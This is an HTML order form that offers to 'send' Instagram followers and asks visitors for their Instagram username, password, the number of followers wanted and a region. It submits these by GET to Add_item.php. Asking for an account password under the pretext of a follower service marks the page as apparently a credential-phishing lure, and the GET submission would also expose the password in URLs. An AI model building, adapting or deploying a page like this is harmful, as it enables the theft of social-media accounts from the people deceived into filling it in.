<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>
        Order Information
    </title>
    <style>
        *{
            margin: 0px;
        }
        body {
            background-image: linear-gradient(90deg,blue,red);
            font-family: Arial, sans-serif;
        }
    
        form {
            margin: 50px auto;
            width: 400px;
            height: 500px;
            background-color: #fff;
            border-radius: 10px;
            padding: 20px;
            box-shadow: 0px 0px 20px rgba(0, 0, 0, 0.2);
        }
    
        input[type="text"], input[type="password"], input[type="number"]{
            width: 100%;
            padding: 10px;
            border: 1px solid rgb(209, 209, 209);
            border-radius: 5px;
            margin-bottom: 15px;
            box-sizing: border-box;
        }
    
        button{
            width: 300px;
            height: 40px;
            border-radius: 5px;
            background-color: purple;
            color: #fff;
            cursor: pointer;
            transition: background-color 0.3s ease;
            border: none;
        }
    
        button:hover {
            background-color: rgb(90, 1, 90);
            color: whitesmoke;
            transition: all 0.375s;
        }
    
        h1 {
            text-align: center;
            margin-top: 0;
        }
    
        p {
            margin: 0;
            padding: 10px 0;
        }
        #float{
            float: left;
            margin-top: -7.5px;
            margin-right: -20px;
        }
        #region{
            width: 400px;
            height: 25px;
        }
    </style>
    
</head>
<body>

    <br>

    <main>
        <center>
    <form action="Add_item.php" method="get">

        <br>

        <p id="float">

        <img src="Instagram-Icon.png" alt="" width="30px" height="30px">
        <h1>Complete Your Order</h1>

        </p>
        <br>
        <br>
        <br>


		<input type="text" id="username" name="username" lang="en" placeholder="Instagram username" required><br><br>

		<input type="password" id="password" name="password" lang="en" placeholder="Instagram password" required><br><br>

		<input type="number" id="amount" name="amount" lang="en" placeholder="Amount of followers that you want for your instagram page" required><br><br>

        <select name="region" id="region" required>
            <option value="">Select your Followers Region</option>
            <option value="">England</option>
            <option value="">Iran</option>
            <option value="">Iraq</option>
            <option value="">Turkey</option>
            <option value="">American</option>
            <option value="">Afghanistan</option>
            <option value="">Russian</option>
            <option value="">India</option>
            <option value="">Chaina</option>
        </select>

        <br>
        <br>
        <br>
        <br>

        <button type="submit">Send My Followers</button>
	</form>
        </center>
    </main>

    
</body>
</html>
